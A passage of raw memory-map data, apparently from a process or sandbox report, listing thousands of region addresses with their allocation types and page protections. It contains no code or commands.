10000000
direct allocation
page read and write
5194000
heap
page read and write
27D000
unkown
page write copy
39B0000
direct allocation
page read and write
B2D000
heap
page read and write
2050000
heap
page read and write
6C9A4000
unkown
page read and write
10630000
direct allocation
page read and write
6C8F1000
unkown
page execute read
BA5000
heap
page read and write
BB1000
heap
page read and write
138F8EA8000
heap
page read and write
21E0000
heap
page read and write
2220000
heap
page read and write
2480000
heap
page read and write
6C8F1000
unkown
page execute read
BB1000
heap
page read and write
10630000
direct allocation
page read and write
5E2000
heap
page read and write
4F6E000
heap
page read and write
1F0000
heap
page read and write
BC4000
heap
page read and write
BB4000
heap
page read and write
2430000
trusted library allocation
page read and write
37F0000
trusted library allocation
page read and write
2041000
heap
page read and write
BC8000
heap
page read and write
330F000
stack
page read and write
44E000
stack
page read and write
402000
unkown
page readonly
6C9A4000
unkown
page read and write
6010000
heap
page read and write
6072000
heap
page read and write
BC4000
heap
page read and write
401000
unkown
page execute read
75B000
heap
page read and write
BAF000
heap
page read and write
6C9A4000
unkown
page read and write
2ED0000
trusted library allocation
page read and write
B57000
heap
page read and write
26D000
unkown
page readonly
241F000
stack
page read and write
400000
unkown
page readonly
BA5000
heap
page read and write
2F01000
heap
page read and write
9AE000
stack
page read and write
401000
unkown
page execute read
3AF0000
direct allocation
page read and write
6C8F0000
unkown
page readonly
138F8EA5000
heap
page read and write
6010000
heap
page read and write
37F0000
trusted library allocation
page read and write
26E0000
trusted library allocation
page read and write
520000
heap
page read and write
2059000
heap
page read and write
138F8E79000
heap
page read and write
474000
heap
page read and write
401000
unkown
page execute read
520000
heap
page read and write
10001000
direct allocation
page execute read
B56000
heap
page read and write
2059000
heap
page read and write
37F0000
trusted library allocation
page read and write
1F0000
heap
page read and write
5510000
trusted library allocation
page read and write
138000
unkown
page readonly
2059000
heap
page read and write
15B0000
heap
page read and write
4AE000
stack
page read and write
38B0000
heap
page read and write
2220000
heap
page read and write
BB8000
heap
page read and write
5A0000
heap
page read and write
3360000
remote allocation
page read and write
26E0000
trusted library allocation
page read and write
26D000
unkown
page readonly
BC3000
heap
page read and write
BB8000
heap
page read and write
BAF000
heap
page read and write
6C8F0000
unkown
page readonly
2041000
heap
page read and write
27D000
unkown
page read and write
37F0000
trusted library allocation
page read and write
2F51000
heap
page read and write
BB2000
heap
page read and write
3B20000
direct allocation
page read and write
3420000
direct allocation
page read and write
544000
heap
page read and write
50CB000
heap
page read and write
584000
heap
page read and write
2041000
heap
page read and write
2059000
heap
page read and write
10094000
direct allocation
page read and write
37F0000
trusted library allocation
page read and write
113CA636000
heap
page read and write
30F0000
heap
page read and write
BA5000
heap
page read and write
BB1000
heap
page read and write
BA5000
heap
page read and write
4B4000
heap
page read and write
4B4000
heap
page read and write
4E0000
heap
page read and write
26E0000
trusted library allocation
page read and write
474000
heap
page read and write
2081000
heap
page read and write
26E0000
trusted library allocation
page read and write
8E0000
heap
page read and write
9B000
stack
page read and write
401000
unkown
page execute read
2041000
heap
page read and write
BC4000
heap
page read and write
BC3000
heap
page read and write
BC3000
heap
page read and write
BB4000
heap
page read and write
B8D000
heap
page read and write
2051000
heap
page read and write
5194000
heap
page read and write
580000
heap
page read and write
6C9A6000
unkown
page write copy
2140000
heap
page read and write
5390000
heap
page read and write
2059000
heap
page read and write
57E000
stack
page read and write
41C4000
heap
page read and write
59B3000
heap
page read and write
2EC0000
heap
page read and write
3E2C000
stack
page read and write
37F0000
trusted library allocation
page read and write
58FE000
stack
page read and write
2041000
heap
page read and write
5D0000
heap
page read and write
6C8F1000
unkown
page execute read
19D000
stack
page read and write
4A4000
heap
page read and write
400000
unkown
page readonly
BC4000
heap
page read and write
BB4000
heap
page read and write
1F0000
heap
page read and write
65C000
heap
page read and write
138F8EA6000
heap
page read and write
78E000
heap
page read and write
4B0000
heap
page read and write
447000
heap
page read and write
5510000
trusted library allocation
page read and write
2059000
heap
page read and write
9B000
stack
page read and write
37F0000
trusted library allocation
page read and write
410000
heap
page read and write
BAC000
heap
page read and write
2041000
heap
page read and write
BA5000
heap
page read and write
2041000
heap
page read and write
3460000
heap
page read and write
BC3000
heap
page read and write
57A000
heap
page read and write
2059000
heap
page read and write
402000
unkown
page readonly
1F36000
heap
page read and write
10000000
direct allocation
page read and write
250000
unkown
page readonly
2760000
heap
page read and write
3F64000
direct allocation
page execute and read and write
2150000
heap
page read and write
51E000
stack
page read and write
2059000
heap
page read and write
5981000
heap
page read and write
1F91000
heap
page read and write
2041000
heap
page read and write
BB8000
heap
page read and write
B64000
heap
page read and write
8C4000
stack
page read and write
10000
unkown
page readonly
3AF0000
direct allocation
page read and write
4E8E000
heap
page read and write
5023000
heap
page read and write
1FF0000
heap
page read and write
40AE000
stack
page read and write
BA5000
heap
page read and write
660000
heap
page read and write
250000
unkown
page readonly
292E000
stack
page read and write
3360000
remote allocation
page read and write
3DAF000
stack
page read and write
614000
heap
page read and write
13F0000
heap
page read and write
10094000
direct allocation
page read and write
5185000
heap
page read and write
19D000
stack
page read and write
10000000
direct allocation
page read and write
51E000
stack
page read and write
6C8F1000
unkown
page execute read
608E000
heap
page read and write
26B0000
direct allocation
page read and write
416E000
stack
page read and write
26A0000
direct allocation
page read and write
AC9000
heap
page read and write
BAF000
heap
page read and write
26D000
unkown
page readonly
2201000
heap
page read and write
766000
heap
page read and write
FAE000
stack
page read and write
584000
heap
page read and write
630000
heap
page read and write
BB8000
heap
page read and write
710000
heap
page read and write
BB1000
heap
page read and write
26D000
unkown
page readonly
6CE62000
unkown
page read and write
BC8000
heap
page read and write
2059000
heap
page read and write
4FB1000
heap
page read and write
5510000
trusted library allocation
page read and write
AA8000
heap
page read and write
62A000
heap
page read and write
530000
heap
page read and write
26D000
unkown
page readonly
5F10000
heap
page read and write
490000
heap
page read and write
5510000
trusted library allocation
page read and write
BA5000
heap
page read and write
400000
unkown
page readonly
24C0000
heap
page read and write
1FF1000
heap
page read and write
BC8000
heap
page read and write
BA9000
heap
page read and write
26E0000
trusted library allocation
page read and write
1E4000
heap
page read and write
2041000
heap
page read and write
564000
heap
page read and write
CAC000
stack
page read and write
BB4000
heap
page read and write
E7B000
heap
page read and write
138F8E94000
heap
page read and write
400000
unkown
page readonly
BA5000
heap
page read and write
78E000
heap
page read and write
5510000
trusted library allocation
page read and write
2059000
heap
page read and write
450000
heap
page read and write
6C8F1000
unkown
page execute read
251000
unkown
page execute read
3AF0000
direct allocation
page read and write
26E0000
trusted library allocation
page read and write
6C9A4000
unkown
page read and write
1006B000
direct allocation
page execute read
44E000
stack
page read and write
BC4000
heap
page read and write
BC4000
heap
page read and write
B63000
heap
page read and write
2041000
heap
page read and write
402000
unkown
page readonly
6C9A4000
unkown
page read and write
BC4000
heap
page read and write
4A4000
heap
page read and write
BC4000
heap
page read and write
138F96E0000
heap
page read and write
20A0000
heap
page read and write
450000
heap
page read and write
BAF000
heap
page read and write
6C9A6000
unkown
page write copy
5510000
trusted library allocation
page read and write
BB4000
heap
page read and write
BC4000
heap
page read and write
26B0000
direct allocation
page read and write
1B76F3F0000
heap
page read and write
BC3000
heap
page read and write
2130000
heap
page read and write
138F8C90000
heap
page read and write
402000
unkown
page readonly
22D0000
heap
page read and write
2042000
heap
page read and write
BAF000
heap
page read and write
1F0000
heap
page read and write
6AE000
stack
page read and write
2041000
heap
page read and write
280000
unkown
page readonly
690000
heap
page read and write
26D000
unkown
page readonly
2041000
heap
page read and write
5096000
heap
page read and write
21F0000
heap
page read and write
10000000
direct allocation
page read and write
1010000
heap
page read and write
BBA000
heap
page read and write
640000
heap
page read and write
402000
unkown
page readonly
136000
unkown
page write copy
4F2E000
heap
page read and write
4B0000
heap
page read and write
1F80000
heap
page read and write
BC8000
heap
page read and write
154F000
stack
page read and write
BC8000
heap
page read and write
10001000
direct allocation
page execute read
5510000
trusted library allocation
page read and write
2041000
heap
page read and write
64B000
heap
page read and write
64B000
heap
page read and write
401000
unkown
page execute read
BAF000
heap
page read and write
4A4000
heap
page read and write
280000
unkown
page readonly
BB4000
heap
page read and write
2724000
heap
page read and write
400000
unkown
page readonly
10001000
direct allocation
page execute read
2080000
trusted library allocation
page read and write
25C1000
direct allocation
page execute read
BC8000
heap
page read and write
BAF000
heap
page read and write
28A4000
heap
page read and write
138F8E94000
heap
page read and write
9B000
stack
page read and write
520000
heap
page read and write
401000
unkown
page execute read
2041000
heap
page read and write
401000
unkown
page execute read
120000
unkown
page readonly
5F11000
heap
page read and write
27D000
unkown
page read and write
2041000
heap
page read and write
6C9A6000
unkown
page write copy
19D000
stack
page read and write
BA2000
heap
page read and write
BC8000
heap
page read and write
B52000
heap
page read and write
5AE000
heap
page read and write
2041000
heap
page read and write
251000
unkown
page execute read
1410000
heap
page read and write
5510000
trusted library allocation
page read and write
2041000
heap
page read and write
1300000
heap
page read and write
2041000
heap
page read and write
39B0000
direct allocation
page read and write
BC3000
heap
page read and write
BB1000
heap
page read and write
37F0000
trusted library allocation
page read and write
1001E000
direct allocation
page readonly
BAF000
heap
page read and write
3AF0000
direct allocation
page read and write
BC3000
heap
page read and write
2059000
heap
page read and write
B5A000
heap
page read and write
29A0000
direct allocation
page read and write
BC6000
heap
page read and write
61B000
heap
page read and write
5F10000
heap
page read and write
5023000
heap
page read and write
401000
unkown
page execute read
26A0000
direct allocation
page read and write
6C8F1000
unkown
page execute read
2041000
heap
page read and write
626000
heap
page read and write
26D000
unkown
page readonly
4F8D000
heap
page read and write
1E4000
heap
page read and write
2041000
heap
page read and write
4F81000
heap
page read and write
39B0000
direct allocation
page read and write
400000
unkown
page readonly
BB1000
heap
page read and write
26C0000
heap
page read and write
37F0000
trusted library allocation
page read and write
617000
heap
page read and write
21C0000
heap
page read and write
5510000
trusted library allocation
page read and write
474000
heap
page read and write
5510000
trusted library allocation
page read and write
401000
unkown
page execute read
BAC000
heap
page read and write
4F6E000
heap
page read and write
BA5000
heap
page read and write
BAC000
heap
page read and write
37F0000
trusted library allocation
page read and write
107C000
stack
page read and write
138F8E96000
heap
page read and write
2059000
heap
page read and write
BB4000
heap
page read and write
28AE000
stack
page read and write
BA5000
heap
page read and write
138F8E98000
heap
page read and write
6C9A6000
unkown
page write copy
2041000
heap
page read and write
BB4000
heap
page read and write
33C000
stack
page read and write
6FC000
stack
page read and write
6C8F0000
unkown
page readonly
2041000
heap
page read and write
2059000
heap
page read and write
2180000
direct allocation
page read and write
900000
heap
page read and write
26A0000
direct allocation
page read and write
138F8E97000
heap
page read and write
1E0000
heap
page read and write
320E000
stack
page read and write
BB8000
heap
page read and write
26D000
unkown
page readonly
113CA62C000
heap
page read and write
2059000
heap
page read and write
120E000
stack
page read and write
F50000
heap
page read and write
65F000
stack
page read and write
554000
heap
page read and write
6CC90000
unkown
page readonly
564F000
stack
page read and write
26D000
unkown
page readonly
BB8000
heap
page read and write
1009A000
direct allocation
page execute read
1006B000
direct allocation
page execute read
251000
unkown
page execute read
B4D000
heap
page read and write
37F0000
trusted library allocation
page read and write
BA5000
heap
page read and write
26A0000
direct allocation
page read and write
4F80000
heap
page read and write
4A4000
heap
page read and write
26E0000
trusted library allocation
page read and write
1F0000
heap
page read and write
5510000
trusted library allocation
page read and write
5510000
trusted library allocation
page read and write
4F2E000
heap
page read and write
401000
unkown
page execute read
BC8000
heap
page read and write
138F8D70000
heap
page read and write
121000
unkown
page execute read
4B4000
heap
page read and write
19D000
stack
page read and write
BC3000
heap
page read and write
26E0000
trusted library allocation
page read and write
2041000
heap
page read and write
2045000
heap
page read and write
250000
unkown
page readonly
5981000
heap
page read and write
25D9000
direct allocation
page read and write
167F000
stack
page read and write
5510000
trusted library allocation
page read and write
450000
heap
page read and write
4F61000
heap
page read and write
1001E000
direct allocation
page readonly
1FE1000
heap
page read and write
BC8000
heap
page read and write
27D000
unkown
page read and write
73B000
heap
page read and write
26E0000
trusted library allocation
page read and write
5E7000
heap
page read and write
BC3000
heap
page read and write
2059000
heap
page read and write
280000
unkown
page readonly
4F81000
heap
page read and write
401000
unkown
page execute read
4E80000
heap
page read and write
584000
heap
page read and write
4D0000
heap
page read and write
401000
unkown
page execute read
BAF000
heap
page read and write
25F0000
direct allocation
page execute and read and write
2041000
heap
page read and write
2180000
direct allocation
page read and write
5510000
trusted library allocation
page read and write
1F0000
heap
page read and write
402000
unkown
page readonly
6C9A9000
unkown
page readonly
2059000
heap
page read and write
2041000
heap
page read and write
4F2E000
heap
page read and write
B87000
heap
page read and write
5510000
trusted library allocation
page read and write
1001E000
direct allocation
page readonly
BC3000
heap
page read and write
580000
trusted library allocation
page read and write
710000
heap
page read and write
5510000
trusted library allocation
page read and write
BAF000
heap
page read and write
24B3000
heap
page read and write
450000
heap
page read and write
BB4000
heap
page read and write
2041000
heap
page read and write
5510000
trusted library allocation
page read and write
144A000
heap
page read and write
113CA650000
heap
page read and write
26D000
unkown
page readonly
1FC9000
heap
page read and write
BB8000
heap
page read and write
412D000
stack
page read and write
39B0000
direct allocation
page read and write
8CF000
stack
page read and write
544000
heap
page read and write
BB8000
heap
page read and write
20F0000
trusted library allocation
page read and write
68E000
stack
page read and write
4B4000
heap
page read and write
113CA62B000
heap
page read and write
BA5000
heap
page read and write
BC3000
heap
page read and write
113CA60B000
heap
page read and write
BC4000
heap
page read and write
BC4000
heap
page read and write
614000
heap
page read and write
4EC0000
heap
page read and write
10001000
direct allocation
page execute read
138F8E73000
heap
page read and write
10094000
direct allocation
page read and write
1FE0000
heap
page read and write
BAF000
heap
page read and write
BC4000
heap
page read and write
400000
unkown
page readonly
BB4000
heap
page read and write
5510000
trusted library allocation
page read and write
10000000
direct allocation
page read and write
BC3000
heap
page read and write
6FD000
stack
page read and write
37F0000
trusted library allocation
page read and write
2059000
heap
page read and write
402000
unkown
page readonly
2059000
heap
page read and write
740000
heap
page read and write
21D0000
heap
page read and write
138F8E60000
heap
page read and write
136E000
stack
page read and write
BC4000
heap
page read and write
5510000
trusted library allocation
page read and write
2059000
heap
page read and write
600000
heap
page read and write
BC3000
heap
page read and write
BB4000
heap
page read and write
3AC0000
direct allocation
page execute and read and write
14EF000
stack
page read and write
BC4000
heap
page read and write
2041000
heap
page read and write
113CA654000
heap
page read and write
BB1000
heap
page read and write
BC4000
heap
page read and write
520000
heap
page read and write
BB8000
heap
page read and write
33BF000
stack
page read and write
BB8000
heap
page read and write
10094000
direct allocation
page read and write
BC3000
heap
page read and write
3DE000
stack
page read and write
629000
heap
page read and write
26E0000
trusted library allocation
page read and write
5911000
heap
page read and write
BC8000
heap
page read and write
2041000
heap
page read and write
BC8000
heap
page read and write
250000
unkown
page readonly
BAF000
heap
page read and write
BAF000
heap
page read and write
2041000
heap
page read and write
12FC000
stack
page read and write
ACA000
heap
page read and write
550000
heap
page read and write
2041000
heap
page read and write
564000
heap
page read and write
1FD1000
heap
page read and write
6C8F0000
unkown
page readonly
138F8E8E000
heap
page read and write
602000
heap
page read and write
BB1000
heap
page read and write
44E000
stack
page read and write
5194000
heap
page read and write
6C8F1000
unkown
page execute read
25E0000
direct allocation
page read and write
400000
unkown
page readonly
BC4000
heap
page read and write
1B76F4D0000
heap
page read and write
59A000
heap
page read and write
590000
trusted library allocation
page read and write
BA5000
heap
page read and write
B45000
heap
page read and write
251000
unkown
page execute read
44E000
stack
page read and write
26E0000
trusted library allocation
page read and write
2041000
heap
page read and write
401000
unkown
page execute read
8FC000
stack
page read and write
10000000
direct allocation
page read and write
2041000
heap
page read and write
B87000
heap
page read and write
10094000
direct allocation
page read and write
BC8000
heap
page read and write
10630000
direct allocation
page read and write
231E000
stack
page read and write
6C9A4000
unkown
page read and write
509D000
heap
page read and write
2041000
heap
page read and write
4E8A000
heap
page read and write
2070000
heap
page read and write
40EC000
stack
page read and write
57FD000
heap
page read and write
9B000
stack
page read and write
6C8F1000
unkown
page execute read
1F01000
heap
page read and write
5AC000
stack
page read and write
BC3000
heap
page read and write
26E0000
trusted library allocation
page read and write
AA0000
heap
page read and write
21CE000
stack
page read and write
2C7F000
stack
page read and write
BB8000
heap
page read and write
BB8000
heap
page read and write
2160000
heap
page read and write
10630000
direct allocation
page read and write
BA5000
heap
page read and write
400000
unkown
page readonly
2059000
heap
page read and write
BB8000
heap
page read and write
1F31000
heap
page read and write
113CA9A0000
heap
page read and write
BB4000
heap
page read and write
5185000
heap
page read and write
BB8000
heap
page read and write
BA5000
heap
page read and write
20C0000
heap
page read and write
401000
unkown
page execute read
4E4000
heap
page read and write
BA5000
heap
page read and write
26F0CFE000
stack
page read and write
550000
heap
page read and write
BB8000
heap
page read and write
BB4000
heap
page read and write
1FE1000
heap
page read and write
6082000
heap
page read and write
BC3000
heap
page read and write
341F000
stack
page read and write
B5C000
heap
page read and write
BA9000
heap
page read and write
5E5000
heap
page read and write
26D000
unkown
page readonly
2059000
heap
page read and write
1009A000
direct allocation
page execute read
B8D000
heap
page read and write
BAF000
heap
page read and write
BC3000
heap
page read and write
1EFC000
heap
page read and write
DAC000
stack
page read and write
26D000
unkown
page readonly
4E4000
heap
page read and write
2059000
heap
page read and write
280000
unkown
page readonly
BAF000
heap
page read and write
37F0000
trusted library allocation
page read and write
4B4000
heap
page read and write
BB8000
heap
page read and write
4AE000
stack
page read and write
400000
unkown
page readonly
460000
heap
page read and write
2F01000
heap
page read and write
2070000
heap
page read and write
136000
unkown
page read and write
9B000
stack
page read and write
138F8E60000
heap
page read and write
BC8000
heap
page read and write
540000
heap
page read and write
73A000
heap
page read and write
BAC000
heap
page read and write
3380000
heap
page read and write
37F0000
trusted library allocation
page read and write
2059000
heap
page read and write
10001000
direct allocation
page execute read
12FE000
stack
page read and write
256F000
stack
page read and write
117C000
stack
page read and write
21C0000
heap
page read and write
401000
unkown
page execute read
8A0000
heap
page read and write
7F0000
heap
page read and write
450E000
stack
page read and write
4B4000
heap
page read and write
2180000
direct allocation
page read and write
1EF0000
heap
page read and write
5911000
heap
page read and write
33CF000
stack
page read and write
B57000
heap
page read and write
2180000
direct allocation
page read and write
402000
unkown
page readonly
2059000
heap
page read and write
10001000
direct allocation
page execute read
10001000
direct allocation
page execute read
584000
heap
page read and write
37F0000
trusted library allocation
page read and write
2059000
heap
page read and write
5FE000
heap
page read and write
2041000
heap
page read and write
615000
heap
page read and write
1F0000
heap
page read and write
94E000
stack
page read and write
BB8000
heap
page read and write
401000
unkown
page execute read
BA5000
heap
page read and write
37F0000
trusted library allocation
page read and write
1E4000
heap
page read and write
3420000
direct allocation
page read and write
400000
unkown
page readonly
BAF000
heap
page read and write
2041000
heap
page read and write
26D000
unkown
page readonly
1E4000
heap
page read and write
1F01000
heap
page read and write
6C9A9000
unkown
page readonly
50CB000
heap
page read and write
BB8000
heap
page read and write
138F8E9F000
heap
page read and write
BC4000
heap
page read and write
BAF000
heap
page read and write
5510000
trusted library allocation
page read and write
138F8EA3000
heap
page read and write
2041000
heap
page read and write
5082000
heap
page read and write
152E000
stack
page read and write
2041000
heap
page read and write
37F0000
trusted library allocation
page read and write
9B000
stack
page read and write
3790000
trusted library allocation
page read and write
2041000
heap
page read and write
3420000
direct allocation
page read and write
3170000
heap
page read and write
BB8000
heap
page read and write
BB8000
heap
page read and write
474000
heap
page read and write
10001000
direct allocation
page execute read
10DA000
heap
page read and write
1F40000
trusted library allocation
page read and write
400000
unkown
page readonly
BB8000
heap
page read and write
4A4000
heap
page read and write
BAF000
heap
page read and write
9C000
stack
page read and write
BA5000
heap
page read and write
BB4000
heap
page read and write
BB4000
heap
page read and write
BAC000
heap
page read and write
BB8000
heap
page read and write
400000
unkown
page readonly
1FE1000
heap
page read and write
2041000
heap
page read and write
BB1000
heap
page read and write
2147000
heap
page read and write
37F0000
trusted library allocation
page read and write
3BB0000
heap
page read and write
27D000
unkown
page write copy
25DF000
direct allocation
page readonly
280000
unkown
page readonly
608E000
heap
page read and write
2041000
heap
page read and write
BA5000
heap
page read and write
402000
unkown
page readonly
5F9000
heap
page read and write
5B0000
heap
page read and write
DD0000
heap
page read and write
BA5000
heap
page read and write
6DF000
stack
page read and write
280000
unkown
page readonly
BA5000
heap
page read and write
27D000
unkown
page write copy
2949000
heap
page read and write
5510000
trusted library allocation
page read and write
BAF000
heap
page read and write
2059000
heap
page read and write
334E000
stack
page read and write
BAF000
heap
page read and write
BC4000
heap
page read and write
4B4000
heap
page read and write
402000
unkown
page readonly
26E0000
trusted library allocation
page read and write
3BE000
stack
page read and write
2059000
heap
page read and write
334F000
stack
page read and write
2041000
heap
page read and write
2059000
heap
page read and write
2041000
heap
page read and write
401000
unkown
page execute read
BB8000
heap
page read and write
339F000
stack
page read and write
62F000
stack
page read and write
105E000
stack
page read and write
37F0000
trusted library allocation
page read and write
614000
heap
page read and write
2041000
heap
page read and write
3A40000
direct allocation
page execute and read and write
2059000
heap
page read and write
BC3000
heap
page read and write
BC8000
heap
page read and write
2041000
heap
page read and write
10000000
direct allocation
page read and write
614000
heap
page read and write
402000
unkown
page readonly
29E6000
heap
page read and write
3BF0000
heap
page read and write
37F0000
trusted library allocation
page read and write
2059000
heap
page read and write
720000
heap
page read and write
5023000
heap
page read and write
400000
unkown
page readonly
402000
unkown
page readonly
3190000
heap
page read and write
1006B000
direct allocation
page execute read
400000
unkown
page readonly
BB8000
heap
page read and write
6C9A9000
unkown
page readonly
26E0000
trusted library allocation
page read and write
554E000
stack
page read and write
10000000
direct allocation
page read and write
400000
unkown
page readonly
39B0000
direct allocation
page read and write
10630000
direct allocation
page read and write
2F4F000
heap
page read and write
1001E000
direct allocation
page readonly
61D000
heap
page read and write
440E000
stack
page read and write
BB8000
heap
page read and write
208D000
heap
page read and write
113CA61A000
heap
page read and write
61F000
heap
page read and write
2059000
heap
page read and write
1470000
heap
page read and write
5EC000
heap
page read and write
37EE000
unkown
page read and write
628000
heap
page read and write
37F0000
trusted library allocation
page read and write
26E0000
trusted library allocation
page read and write
251000
unkown
page execute read
113CA619000
heap
page read and write
2041000
heap
page read and write
2059000
heap
page read and write
591D000
heap
page read and write
250000
unkown
page readonly
26D000
unkown
page readonly
27D000
unkown
page read and write
568C000
stack
page read and write
5802000
heap
page read and write
BB8000
heap
page read and write
6C8F1000
unkown
page execute read
400000
unkown
page readonly
509D000
heap
page read and write
564000
heap
page read and write
BAF000
heap
page read and write
5096000
heap
page read and write
1020000
heap
page read and write
BAF000
heap
page read and write
B28000
heap
page read and write
BC3000
heap
page read and write
1F0000
heap
page read and write
3FAE000
stack
page read and write
10094000
direct allocation
page read and write
3AF0000
direct allocation
page read and write
BC8000
heap
page read and write
250000
unkown
page readonly
4B4000
heap
page read and write
19D000
stack
page read and write
591D000
heap
page read and write
19D000
stack
page read and write
120000
unkown
page readonly
BC3000
heap
page read and write
138F8D90000
heap
page read and write
401000
unkown
page execute read
890000
heap
page read and write
1350000
heap
page read and write
99E000
stack
page read and write
2041000
heap
page read and write
102B000
heap
page read and write
250000
unkown
page readonly
B8C000
heap
page read and write
782000
heap
page read and write
6C9A4000
unkown
page read and write
6C8F1000
unkown
page execute read
4A4000
heap
page read and write
4E0000
heap
page read and write
3360000
remote allocation
page read and write
280000
unkown
page readonly
5E2000
heap
page read and write
4F81000
heap
page read and write
74B000
heap
page read and write
2059000
heap
page read and write
BAC000
heap
page read and write
D5C000
stack
page read and write
2041000
heap
page read and write
29B4000
heap
page read and write
41C0000
heap
page read and write
608E000
heap
page read and write
BAC000
heap
page read and write
2059000
heap
page read and write
2059000
heap
page read and write
27D000
unkown
page write copy
11E0000
heap
page read and write
6C8F1000
unkown
page execute read
10B0000
heap
page read and write
32000
unkown
page readonly
57C0000
heap
page read and write
10001000
direct allocation
page execute read
1006B000
direct allocation
page execute read
4B0000
heap
page read and write
113CA657000
heap
page read and write
5700000
heap
page read and write
BBA000
heap
page read and write
26A0000
direct allocation
page read and write
2720000
heap
page read and write
9AF000
stack
page read and write
6081000
heap
page read and write
113CA642000
heap
page read and write
3E0000
heap
page read and write
3420000
direct allocation
page read and write
1F30000
heap
page read and write
BAC000
heap
page read and write
6C9A9000
unkown
page readonly
10630000
direct allocation
page read and write
26A0000
direct allocation
page read and write
1001E000
direct allocation
page readonly
3801000
heap
page read and write
402000
unkown
page readonly
3DB0000
direct allocation
page execute and read and write
1B76F775000
heap
page read and write
2310000
heap
page read and write
BB8000
heap
page read and write
2059000
heap
page read and write
2059000
heap
page read and write
BC6000
heap
page read and write
617000
heap
page read and write
6D0000
heap
page read and write
BB8000
heap
page read and write
5394000
heap
page read and write
61C000
heap
page read and write
11000
unkown
page execute read
27D000
unkown
page read and write
2041000
heap
page read and write
BB4000
heap
page read and write
157E000
stack
page read and write
5510000
trusted library allocation
page read and write
BB8000
heap
page read and write
4B4000
heap
page read and write
10FC000
stack
page read and write
520000
heap
page read and write
BC4000
heap
page read and write
BA5000
heap
page read and write
402000
unkown
page readonly
1FE1000
heap
page read and write
250000
unkown
page readonly
1B76F770000
heap
page read and write
509D000
heap
page read and write
282E000
stack
page read and write
3B00000
direct allocation
page read and write
1F61000
heap
page read and write
5981000
heap
page read and write
400000
unkown
page readonly
6C8F1000
unkown
page execute read
3AF0000
direct allocation
page read and write
113CA9A5000
heap
page read and write
55B000
heap
page read and write
68E000
stack
page read and write
BC8000
heap
page read and write
78E000
heap
page read and write
6C8F0000
unkown
page readonly
554000
heap
page read and write
BC4000
heap
page read and write
2059000
heap
page read and write
19D000
stack
page read and write
6C9A9000
unkown
page readonly
BC8000
heap
page read and write
B36000
heap
page read and write
5081000
heap
page read and write
1F61000
heap
page read and write
26D000
unkown
page readonly
1FE1000
heap
page read and write
5510000
trusted library allocation
page read and write
4B4000
heap
page read and write
251000
unkown
page execute read
4F81000
heap
page read and write
2041000
heap
page read and write
214A000
heap
page read and write
BB8000
heap
page read and write
138F8E75000
heap
page read and write
37F0000
trusted library allocation
page read and write
9B0000
heap
page read and write
30000
unkown
page write copy
113CA639000
heap
page read and write
FBC000
stack
page read and write
BB8000
heap
page read and write
402000
unkown
page readonly
25B0000
heap
page read and write
1E4000
heap
page read and write
730000
heap
page read and write
1F60000
heap
page read and write
BA5000
heap
page read and write
138F8E6E000
heap
page read and write
26A0000
direct allocation
page read and write
1F0000
heap
page read and write
1001E000
direct allocation
page readonly
608E000
heap
page read and write
2EC0000
heap
page read and write
1006B000
direct allocation
page execute read
2200000
heap
page read and write
2932000
heap
page read and write
C05000
heap
page read and write
5C0000
heap
page read and write
5AA000
heap
page read and write
BC8000
heap
page read and write
2020000
heap
page read and write
265D000
stack
page read and write
280000
unkown
page readonly
2041000
heap
page read and write
5023000
heap
page read and write
27D000
unkown
page write copy
2041000
heap
page read and write
781000
heap
page read and write
2171000
heap
page read and write
AFA000
stack
page read and write
78E000
heap
page read and write
5802000
heap
page read and write
2041000
heap
page read and write
275E000
stack
page read and write
2059000
heap
page read and write
2041000
heap
page read and write
9EF000
stack
page read and write
BA5000
heap
page read and write
138F8E9C000
heap
page read and write
BB4000
heap
page read and write
138F8E91000
heap
page read and write
71A000
heap
page read and write
5023000
heap
page read and write
4B4000
heap
page read and write
BB4000
heap
page read and write
4F6E000
heap
page read and write
26E0000
trusted library allocation
page read and write
BB8000
heap
page read and write
4A4000
heap
page read and write
4FB1000
heap
page read and write
280000
unkown
page readonly
72A000
heap
page read and write
61A000
heap
page read and write
26E0000
trusted library allocation
page read and write
BC3000
heap
page read and write
580E000
stack
page read and write
5EB000
heap
page read and write
B97000
heap
page read and write
4FB1000
heap
page read and write
401000
unkown
page execute read
5023000
heap
page read and write
3ABE000
stack
page read and write
2180000
direct allocation
page read and write
4F2E000
heap
page read and write
6B0000
heap
page read and write
4FB1000
heap
page read and write
2230000
heap
page read and write
2F3F000
heap
page read and write
113CA647000
heap
page read and write
B57000
heap
page read and write
19D000
stack
page read and write
1FF6000
heap
page read and write
544000
heap
page read and write
10000000
direct allocation
page read and write
5F11000
heap
page read and write
BC3000
heap
page read and write
B4A000
heap
page read and write
402000
unkown
page readonly
5510000
trusted library allocation
page read and write
1010000
heap
page read and write
C00000
heap
page read and write
5510000
trusted library allocation
page read and write
1006B000
direct allocation
page execute read
2041000
heap
page read and write
BA2000
heap
page read and write
BB8000
heap
page read and write
72F000
stack
page read and write
6C9A9000
unkown
page readonly
72B000
heap
page read and write
2E3E000
heap
page read and write
72A000
heap
page read and write
1B76F588000
heap
page read and write
26E0000
trusted library allocation
page read and write
737000
heap
page read and write
4F8D000
heap
page read and write
8BF000
stack
page read and write
26E0000
trusted library allocation
page read and write
474000
heap
page read and write
4F2E000
heap
page read and write
BB4000
heap
page read and write
BA5000
heap
page read and write
6C0000
heap
page read and write
B3D000
heap
page read and write
4D70000
heap
page read and write
400000
unkown
page readonly
46B000
heap
page read and write
1009A000
direct allocation
page execute read
BC3000
heap
page read and write
DBC000
stack
page read and write
27A4000
heap
page read and write
BA5000
heap
page read and write
1001E000
direct allocation
page readonly
2A1F000
stack
page read and write
B67000
heap
page read and write
6C9A9000
unkown
page readonly
BA5000
heap
page read and write
BAF000
heap
page read and write
2041000
heap
page read and write
9B000
stack
page read and write
5EB000
heap
page read and write
BB8000
heap
page read and write
78E000
heap
page read and write
616000
heap
page read and write
37F0000
trusted library allocation
page read and write
474000
heap
page read and write
37F0000
trusted library allocation
page read and write
4F6E000
heap
page read and write
1001E000
direct allocation
page readonly
BB8000
heap
page read and write
2059000
heap
page read and write
6C9A4000
unkown
page read and write
24B0000
heap
page read and write
1009A000
direct allocation
page execute read
113CA652000
heap
page read and write
554000
heap
page read and write
5180000
heap
page read and write
509A000
heap
page read and write
584000
heap
page read and write
B57000
heap
page read and write
5194000
heap
page read and write
2D2E000
stack
page read and write
570000
heap
page read and write
2059000
heap
page read and write
BAC000
heap
page read and write
BC3000
heap
page read and write
27D000
unkown
page read and write
2F4F000
heap
page read and write
BC3000
heap
page read and write
296C000
stack
page read and write
251000
unkown
